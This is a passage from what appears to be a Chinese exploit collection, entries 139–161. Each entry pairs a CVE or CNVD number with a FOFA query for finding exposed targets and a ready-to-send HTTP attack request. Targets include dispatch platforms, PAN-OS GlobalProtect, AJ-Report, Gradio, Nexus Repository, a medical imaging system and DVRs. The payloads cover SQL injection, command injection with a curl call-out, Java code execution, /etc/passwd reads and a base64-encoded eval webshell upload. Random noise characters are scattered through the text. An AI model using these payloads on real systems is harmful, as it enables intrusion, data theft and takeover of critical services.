" }/ i) D+ q2 G* ?4 \2 ]: d3 r% _7 B6 c" A$ O& _
+ C& d+ O- W& v& r; a' H. }. r139. 福建科立讯通信指挥调度平台editemedia.php sql注入" j/ S. x+ a! c$ ^* O. }4 `
CVE-2024-2622
, K6 n8 R% p: |, @9 c; g IFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"$ ]: i* h H8 ^+ e8 F6 Q5 z
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
4 Y: t) X5 q |Host: x.x.x.x& |+ `9 r+ d6 X! O- U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* t: H0 C& v1 Y" |6 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ X; n/ M8 Z9 _5 r! `8 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 \2 v) w0 g! z, YAccept-Encoding: gzip, deflate, br) N8 G! r' u' C1 }0 C. W" f
Connection: close7 y4 p" @) ?+ n9 ]+ F' m$ \
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk5 W# J7 k( o. R. x" U9 B
Upgrade-Insecure-Requests: 1
/ i) D* h- @. V0 c4 s3 D7 N# O4 K, B' m. J- h
' c+ |+ J2 q; T( V
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
0 n: `1 n# h# x) d( t$ DCVE-2024-2566
, Q) z; G% O8 m8 v, X0 kFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 e6 {4 C% E/ N/ E# @$ \GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.15 S: N" c3 ^* A) ^% y
Host: x.x.x.x& S9 G* E, ^& D3 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 ^$ c4 t/ l5 W6 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& K( a7 B0 e/ x3 S" L5 fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 g: _$ K( Q4 ~" K7 X8 i
Accept-Encoding: gzip, deflate, br- S& U g. S* f: w9 h! W) g9 G
Connection: close
( m! [ ~6 J f |2 q* bCookie: authcode=h8g9
* Y% S: l K; b. GUpgrade-Insecure-Requests: 1
& _& n* e$ f2 G4 I- |( t4 E( O- d% U
6 i, Z( C. ~, l! B, j0 X U5 n141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入) u3 W* I/ X" V8 B+ p
FOFA:body="指挥调度管理平台"
0 q3 ]# ^ r9 `* p1 O3 }' HPOST /app/ext/ajax_users.php HTTP/1.1
# q* t/ A5 N, i9 ?% YHost: your-ip
5 K) [) o3 \- a( O% K8 M P6 M- U' @User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info- o4 a( a3 P2 ^( H2 i& F8 R( A
Content-Type: application/x-www-form-urlencoded
' X/ C/ q. @# Y, @8 L! j) d1 ~7 v0 `: ~
, l: T" E) A6 d" xdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -8 y; f/ M( c4 b4 c2 _ ~: J
$ B3 t; m4 N5 {& ~% ^7 f' D/ h
* `2 x& T1 F3 ]142. CMSV6车辆监控平台系统中存在弱密码# P- ~+ T" m" [ s i% K; L
CVE-2024-29666+ }7 H. t' S- R
FOFA:body="/808gps/"! G) d; F& P& N F/ x2 ?5 z m
admin/admin5 ~$ S% ] ?2 c# q! K: e7 A, I
143. Netis WF2780 v2.1.40144 远程命令执行2 z6 v1 i* u; u* z0 A5 i5 T, ~
CVE-2024-25850, P. h1 I% |9 p6 v3 p$ p0 h
FOFA:title='AP setup' && header='netis'4 Z# x' R" s. `. A$ O
PAYLOAD9 u) W% h, O+ g* s+ `' P: q: X
! e0 t1 F7 Q9 z- ?
144. D-Link nas_sharing.cgi 命令注入
& E3 ~ \( }! L- e3 n& u# k F# aFOFA:app="D_Link-DNS-ShareCenter"( U2 ^! G0 s! A# M8 o! ?; `3 t9 Z/ O
system参数用于传要执行的命令: Z$ n" V6 E0 [# e% T
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
* |0 d( I( ~$ K; O! ~Host: x.x.x.x
/ `' S t" M. X9 t1 z a. b1 F8 hUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0/ E6 v' F% w) c9 C
Connection: close* @) o1 X Y e" r
Accept: */*
7 K6 w. _$ F( L( a4 VAccept-Language: en K+ [- R* L' v1 c" T& l" B
Accept-Encoding: gzip
/ Q) C+ k% ~% o) c; n' B) N
8 h0 m5 ^- ]# P3 L( [( t' O$ [1 E0 p( k2 o, D
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
# k1 [" J- A1 FCVE-2024-3400& q1 j5 h) b7 T
FOFA:icon_hash="-631559155"$ J& O2 C7 l1 K9 r! ~. R+ j3 R. l! p, J
GET /global-protect/login.esp HTTP/1.1
7 y) U% }$ o! K) q7 [Host: 192.168.30.112:1005
& w+ Z! x. G' v. A/ C7 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' l, u5 R* S) W; I9 s+ R
Connection: close' a7 @! q+ u5 e7 C/ v
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;; x. n* f ?/ ]# C7 E
Accept-Encoding: gzip9 Q p' s- H) l0 r0 d
$ F0 m1 k' J- G6 V2 g) e3 X) R% W+ g6 a/ b" _( z y# G
146. MajorDoMo thumb.php 未授权远程代码执行
2 ?, o- ~ q, i- D9 I$ m, S3 ZCNVD-2024-02175) |6 N3 \# K( E9 c" t9 I# b
FOFA:app="MajordomoSL"
3 v$ y0 d2 J- _- PGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
; Q t D6 {" ^7 {Host: x.x.x.x
: Q q/ p1 O M5 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84; d2 ?: E& N$ ^1 W2 k8 w ]2 F& M: g7 G3 C
Accept-Charset: utf-84 I& v( u+ t' x9 O
Accept-Encoding: gzip, deflate
; E$ N8 q z; RConnection: close
) A4 t% k# E& K1 u3 D9 ?1 |2 a3 O& O9 h* _( N8 }' o8 _
% l6 |1 v8 m" E" f/ X147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
- {. G& Z: @6 gCVE-2024-32399$ W) G8 W7 u' \# R3 Q- k
FOFA:body="RaidenMAILD"# s) c5 _$ y: o
GET /webeditor/../../../windows/win.ini HTTP/1.1
$ L: D3 z, ^, H( d4 p; Q0 \Host: 127.0.0.1:810 K6 b8 |" L! s. |' F% Q0 [5 \8 g
Cache-Control: max-age=0
! m5 u6 ^, o9 q- ZConnection: close, _# W- f% U( a: [; ] O
+ C5 m1 i0 d* M# R3 M
+ q$ y7 f- p1 v: U148. CrushFTP 认证绕过模板注入
/ S+ L) B) E2 {( A) v0 W( yCVE-2024-4040
, }4 w8 q8 C7 E4 }" cFOFA:body="CrushFTP"5 v- e! h7 a6 V( h6 k' D) l/ y
PAYLOAD+ ?8 E4 ^9 |0 C
& @6 T9 V3 P- A4 J
149. AJ-Report开源数据大屏存在远程命令执行
! |0 h: l7 ^6 XFOFA:title="AJ-Report"
! R0 |; M. C8 h J4 w% T1 w7 `5 ^$ ^1 z, M- Z& ~: i# `
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1% P: u2 d+ @. Q- w+ P5 f( R4 v
Host: x.x.x.x' l9 n) b/ c Q8 c8 |# s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 `$ L w9 G; W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( Z% Q2 }) L$ _% t# c: X, vAccept-Encoding: gzip, deflate, br
* {1 i$ F9 I9 jAccept-Language: zh-CN,zh;q=0.9
2 O3 m3 I9 d- Z; LContent-Type: application/json;charset=UTF-8
/ D; i+ l- C8 u5 G/ J1 B% rConnection: close
9 N* l1 D. I' u) i8 n3 H8 V6 j4 O
& e" u0 l6 \5 ~{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: |- N: C5 q% Z1 b/ n
3 a; |" e# N% t1 I; E+ O3 e150. AJ-Report 1.4.0 认证绕过与远程代码执行+ H `& K. M3 T e6 L" H
FOFA:title="AJ-Report"( L3 Q7 Z2 e8 g, P+ c
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' p7 [+ Q4 c$ m2 `/ b9 DHost: x.x.x.x. j5 m* h) D/ T2 p" T @! U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 }, R7 l- [: i4 h- eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
I. R5 _& U7 H* I% z! sAccept-Encoding: gzip, deflate, br+ [& J- `; H: V) I
Accept-Language: zh-CN,zh;q=0.94 \, i, d) }/ d
Content-Type: application/json;charset=UTF-8
' b: m. {5 n9 ]- R5 t ^1 zConnection: close
3 G2 P' F5 ^$ T/ D- OContent-Length: 339$ L0 j% f% l- [0 j* t( r; M
( Q- I/ N4 L8 k, B
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
$ D7 _' g' I3 L8 a5 h0 f% L& c8 B9 S5 d- \" B9 \! L3 o/ R
+ z F$ b; ^: m; z( l! g- t2 {
151. AJ-Report 1.4.1 pageList sql注入
( ~1 X2 {% H+ a# e7 V) XFOFA:title="AJ-Report"- p* L& E- \2 J. f& c" d
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.19 ?0 i( _3 }' W/ S! ^. |5 ~. v. p
Host: x.x.x.x2 V5 Q: ~% X, s+ W+ Q& n) \$ O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 e% `/ {: O0 S
Connection: close
2 ~% i& J% q) m6 E' s5 MAccept-Encoding: gzip
7 {) |5 K, S+ R% `/ o
# o) L3 R8 I7 q# Y& [+ G- o3 l v* ]5 d
152. Progress Kemp LoadMaster 远程命令执行2 {) J( }% h B# h$ o+ V c
CVE-2024-1212, f. T [7 K$ Z. F* w" x
LoadMaster <= 7.2.59.2 (GA)
* Y7 r* y$ Z$ b5 @# D1 |4 ILoadMaster<=7.2.54.8 (LTSF) ^$ W D: i+ {
LoadMaster <= 7.2.48.10 (LTS)
+ I: `# ]: b( C& C C; PFOFA:body="LoadMaster"# a# j A' z5 I9 n
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
+ J+ H9 r: C: m2 f q+ K/ j* _GET /access/set?param=enableapi&value=1 HTTP/1.1
0 V% E6 q8 w: w) Q7 PHost: x.x.x.x
7 D. Y! O: W" x6 f, wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
. R) N/ ]% Y$ _Connection: close7 d- G( q# H$ u8 W' _3 L
Accept: */** g) h$ W, z1 w- i0 _; m) Y( L
Accept-Language: en5 y* i, T5 h9 T1 H
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
& E* k0 a: k5 f5 h9 W- w& o* @% ?Accept-Encoding: gzip1 w- L; F3 k' |/ \. C
7 v0 F; z: W& {) l* C2 n! S- E
8 _( A7 x2 b7 B# g$ ]153. gradio任意文件读取
6 ?4 c& k7 B* R' ~CVE-2024-1561FOFA:body="__gradio_mode__"5 f$ V6 P$ \$ T- P2 U+ e v
第一步,请求/config文件获取componets的id2 a5 H- g7 r! o. e, U
http://x.x.x.x/config- N/ ?$ ?) [6 e/ g: ~; A& A
% E+ k Y, G5 D7 R \, k4 Y
# B' h5 C3 t C; ?' _* l: F5 X' L
第二步,将/etc/passwd的内容写入到一个临时文件( g" }% \) B) l' O. E$ A
POST /component_server HTTP/1.1
' B- M6 a3 y0 F4 k" NHost: x.x.x.x ?4 r5 N% c9 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
' J+ {: D7 a* K3 ^/ f/ \Connection: close
7 ^0 u7 G; v! x+ _' W' KContent-Length: 1158 s" x7 F4 W/ H( P
Content-Type: application/json
! C) z" }2 G: C# ] O! j7 uAccept-Encoding: gzip. I+ N! Q% G& u4 C9 G. C
) U! F- u/ ^0 N$ _, W{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}6 i- s) `% }+ P: H
# K5 A8 s5 v6 I' Q
5 `7 v! K3 }& K: d5 h5 _. p第三步访问) P+ k: K7 v" s+ N. [5 U5 @
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd$ Z$ k- X% i; {4 P2 R4 \6 E
. J* Q: Z4 L' p, h: H
4 C1 J3 a6 r& u+ M% \154. 天维尔消防救援作战调度平台 SQL注入
, M% B+ n% w0 \% i, f: ]# l* }CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
; Y, T" W9 I8 a4 D6 pPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
; _5 s) J0 q4 @" F& S6 u( wHost: x.x.x.x
( V6 Y w; x( H1 y- V8 jContent-Length: 1066 C% Z N& a, c- P- \# E
Cache-Control: max-age=05 g5 ?' h: }% [( R) ?$ ^$ H
Upgrade-Insecure-Requests: 1: X. V/ ?2 G/ u r' L5 Z
Origin: http://x.x.x.x6 q' H5 Y. }, e- O$ c' U
Content-Type: application/json( \8 X# l9 p/ ?4 }3 f% a. v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+ ~, o# D. M$ l* E# P; q. r6 P! l' nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 K# y+ {3 N- f. i
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
& O! X+ x# [% O/ ]' ]Accept-Encoding: gzip, deflate
0 G, f$ m3 I1 K! iAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.78 I; ~1 |0 m2 Y; V" Y4 o
Connection: close
" D& n7 l9 _+ ^- i# G" ]% U& f, u' t3 [' P2 C# M' C* O
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
/ o Y' }% c$ _- \# `+ _6 S! X1 k/ H) P
8 [" k6 w0 G }" Z% W0 o. G155. 六零导航页 file.php 任意文件上传
, D7 M/ j, f+ s; o# |CVE-2024-34982# s2 r2 {; U) @
FOFA:title=="上网导航 - LyLme Spage"
& Q, K- o1 c# u- i9 EPOST /include/file.php HTTP/1.1
5 Z. U3 N9 o0 i4 G/ dHost: x.x.x.x
6 [; i' X) \: Q R4 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.01 l' ^6 A8 s; U% k7 Q% J
Connection: close
5 p1 I6 u0 u5 _1 I% RContent-Length: 232
( n" D2 ~7 a( q) B. f ^Accept: application/json, text/javascript, */*; q=0.01
$ O! c' W, p( e6 r; C0 s# U! oAccept-Encoding: gzip, deflate, br- [6 ~8 d; e K0 F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 ^, h& g" i! P! m$ v; f, Q
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f# K' o5 P8 R: \2 I% A0 X) U
X-Requested-With: XMLHttpRequest
% _6 \' T' ?. j! F, X
! W& P* r% D' z2 t$ Q! P-----------------------------qttl7vemrsold314zg0f
q2 f7 {8 e6 K* c, R0 YContent-Disposition: form-data; name="file"; filename="test.php": p$ ]( I5 Q# ?9 @2 T ]
Content-Type: image/png
7 m3 f g. O2 i, b6 }1 g' f! l: C6 D: D4 C
<?php phpinfo();unlink(__FILE__);?>3 N9 ?+ m) Z% `- d% g
-----------------------------qttl7vemrsold314zg0f--3 X0 d1 [- F6 @; {
! I& q" U" g& F4 }+ i4 H7 k: c6 s! \" [+ x' l! k* n
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
f1 x( Y6 ]1 E& M9 R Q; ~0 T! W) u8 L) ]2 [% `( h2 n
156. TBK DVR-4104/DVR-4216 操作系统命令注入( n+ X7 }1 D4 b5 w+ N
CVE-2024-3721+ r5 H! z; t* i; f7 o7 l5 f" I
FOFA:"Location: /login.rsp"2 p* M$ S) \& V$ p, v4 N
·TBK DVR-4104
- l4 {5 h. s& W; D% ]/ K: Z·TBK DVR-4216* P( E. i4 f1 Q- a7 Q, P
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"$ h. y8 ^& \2 V1 g j/ ]/ ?+ w
a( b6 O* ^. D3 ~( }% F& u6 i, L
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
! ` Z2 {7 _+ \/ P g- uHost: x.x.x.x
! x) R F" J; CUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" W% E* O1 L: x6 `) f% X. U* ~: ~4 M
Connection: close5 s- m7 K( d7 W+ X5 }4 W' p
Content-Length: 0
9 _2 t- O4 h) E8 ]6 p w3 OCookie: uid=1
0 q8 R2 ]/ i& N8 LAccept-Encoding: gzip2 U9 e. z3 h5 L
; m& S u" q) j; O# }
& G$ z$ r! A+ B0 M4 e( ]2 Y157. 美特CRM upload.jsp 任意文件上传
, n2 }% S4 {, d WCNVD-2023-069714 e" S- m+ p0 E6 V
FOFA:body="/common/scripts/basic.js"& y/ F$ F, _" m: u7 ^
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
2 O, E* i* D7 y4 N7 H n# w# dHost: x.x.x.x. D% p3 e6 X$ Y' d! S" \& }, P2 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36) N- @2 F' Q7 ^2 Q
Content-Length: 7097 F6 G) W. @3 m; c# k: Q# x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% m# E4 N" x1 `" m* C" iAccept-Encoding: gzip, deflate
$ t9 p) w9 A2 o# G9 `( B) q- t+ rAccept-Language: zh-CN,zh;q=0.90 g1 v# F4 q& ~( k2 ~
Cache-Control: max-age=0
' A2 m$ @! i8 P' MConnection: close
8 Q0 W7 `( I! n5 |Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
[# r1 j- M, K8 T" i/ K2 IUpgrade-Insecure-Requests: 1
- u3 n( G$ f6 D, n* G8 y+ Z f5 D% U- }9 ~0 q* Z
------WebKitFormBoundary1imovELzPsfzp5dN
, H+ N$ l/ s: t1 E6 JContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"/ V% G* G' u5 n- N
Content-Type: application/octet-stream
5 d$ [9 h) x, E( }
2 H) T* X# P. L8 C! Y4 M1 w; Lnyhelxrutzwhrsvsrafb: H+ _' d8 Z8 V% @9 @# o: r
------WebKitFormBoundary1imovELzPsfzp5dN
2 ?/ u9 f2 p/ z( g7 \: Q9 tContent-Disposition: form-data; name="key"4 T. M0 P/ s+ ~/ J ?; p
6 ^9 T+ \$ ^% a7 R" ]& q* qnull% A( P( Y9 P' a# H
------WebKitFormBoundary1imovELzPsfzp5dN
; k* b3 U9 Y4 Y- CContent-Disposition: form-data; name="form"
$ k! b r* j1 G" l0 l8 X; S
7 d6 T. z6 g+ y5 O) A* x/ ^" `null
) e) B5 _) j0 w- {: q- |------WebKitFormBoundary1imovELzPsfzp5dN7 L+ {, `3 g" f6 O6 V0 c
Content-Disposition: form-data; name="field"2 h8 ]+ _* p. ~* h$ ~
. S) h! g( E5 Ynull
" ?3 l- e7 d- c------WebKitFormBoundary1imovELzPsfzp5dN
6 Z+ q+ g7 x& M* G6 aContent-Disposition: form-data; name="filetitile"
; F! Z( t) a, `$ u( Z! ^, d
0 K: [* H2 a- u- g0 p; a+ Vnull5 ?" \: ?8 U2 O2 f6 j+ a
------WebKitFormBoundary1imovELzPsfzp5dN+ E+ A7 f X: K" ?! e
Content-Disposition: form-data; name="filefolder"
6 R1 u' ~# s/ \7 k# f7 D, {' }6 h8 f$ p$ \# S8 w% R; E
null" w/ ~6 m8 B( l" j- c4 {, _+ r
------WebKitFormBoundary1imovELzPsfzp5dN--0 v; D! e% j8 W( y
; S+ A. k( O, y0 _4 o X- |
( I8 j" V8 j' s8 Q$ g2 Yhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
5 O: G) ?* z8 Q0 o9 \8 F+ F& s
/ F( B( Q4 Y. J7 l0 p7 U& s" f' S158. Mura-CMS-processAsyncObject存在SQL注入/ R [. L$ [$ V1 F2 J, T- c
CVE-2024-32640
+ O, ~" ^. N; Z5 SFOFA:"Generator: Masa CMS"0 g7 h% a, g/ \( | Z3 j
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.17 i. p) l5 b- d. C
Host: {{Hostname}}7 W3 o) c. C' X" ]: o* U" E
Content-Type: application/x-www-form-urlencoded
5 y6 B6 g; p) _: A5 J
7 Q! K7 N2 T( v) h8 [object=displayregion&contenthistid=x\'&previewid=1
, s- d* O1 J3 l' P4 B
, Y) o4 x; X) Q' c* g# y# n. \) T6 p5 Q- U
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传: z" ~; V3 _$ d2 w t* G
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
2 X P6 ]0 Y* E' ?( S; tPOST /webservices/WebJobUpload.asmx HTTP/1.1+ K B' O! ?# }0 Z% W5 h
Host: x.x.x.x
. U! G% b0 I6 x Q( OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36- ]# W9 `3 k! G4 }; Q5 C
Content-Length: 1080
* P2 {5 M v; R! w- A1 O& ?Accept-Encoding: gzip, deflate, F& @& {" z9 O* ~4 r
Connection: close6 |, ^; K' ^& g% b7 y
Content-Type: text/xml; charset=utf-8$ Y- T: B+ a! Z5 }$ n2 Z D) {4 a# @% w
Soapaction: "http://rainier/jobUpload"7 ^% I: A( G. G8 ?, Q
" h( V# l* p8 A1 p" ~+ p/ i% X
<?xml version="1.0" encoding="utf-8"?>
9 h- W% P, F9 f/ R3 C5 |; \; J0 c<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
8 X) E3 D" u' I5 }$ ?* g<soap:Body>6 Z' l' R3 r+ e1 `( F" y
<jobUpload xmlns="http://rainier">1 N- J2 S2 z8 @# r5 U6 ^3 Q% r8 f
<vcode>1</vcode>: ^' a- d! s; F, G. e: c
<subFolder></subFolder>% L! |5 L* z5 s s6 V6 i" n& B
<fileName>abcrce.asmx</fileName>( y4 _2 ]6 X7 \: y: {1 u" @
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
+ m {$ w2 S7 F' x</jobUpload>; C5 O5 f% v6 P! }, b7 Q; d! J
</soap:Body>
( x/ {( K. s% o7 ?7 `& y- b& p</soap:Envelope>7 v+ i7 J+ ]3 g
. T8 P, w5 ?4 m, r' P
: k% h' E8 m' K8 e/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")+ c1 G4 U, j' _. u E- i1 J1 _ A
n. E) l, j; i: h2 @- o' T8 S! J; _# }5 w2 t/ _: ]* u1 q, ]! _
160. Sonatype Nexus Repository 3目录遍历与文件读取1 o; s) V' _9 C; U/ I
CVE-2024-4956' E6 a8 R4 ^% K
FOFA:title="Nexus Repository Manager"
8 X% a9 H* W8 ?9 D' b1 T7 QGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1) f9 {7 {' }( d) ~7 y, l4 E. m
Host: x.x.x.x2 `, p; R, z+ A8 ?0 G
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
6 w7 N4 s$ i2 O, Z8 C5 A! jConnection: close& o" I$ W$ @/ \2 d2 b% q$ E7 t: E
Accept: */*
3 `1 D z) ]2 \3 r* [- W2 z% QAccept-Language: en
! Q0 P$ K. {+ ?! B' m1 w+ X4 n) ?Accept-Encoding: gzip
! X( d% Q0 w/ f& R9 u7 L3 F0 z& U; D9 d
5 }( ]- w2 Q; z" F3 V1 ?
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
; ?. @/ C9 g. ~1 Z* C; x1 H# Q" J6 VFOFA:body="/KT_Css/qd_defaul.css"" C# U1 {) k8 R& ~5 F% \
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
5 E% x- R: A+ c# u4 I- CPOST /Webservice.asmx HTTP/1.1
. q2 e; F" |0 s1 K! Q6 RHost: x.x.x.x5 T# A- J. `% }4 y7 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
8 S3 {6 A* a' ?Connection: close
6 G$ w5 V- k; P$ K0 U! PContent-Length: 445
7 q1 g; h8 [1 `/ CContent-Type: text/xml
: Q, N/ o: `( z& v: ?Accept-Encoding: gzip
5 d# d. `1 k1 u f6 k
/ f6 i" P% G7 c7 E. Q; Q' I* I<?xml version="1.0" encoding="utf-8"?>4 }! m, N/ r x$ r3 n. M
<soap:Envelope xmlns:xsi="
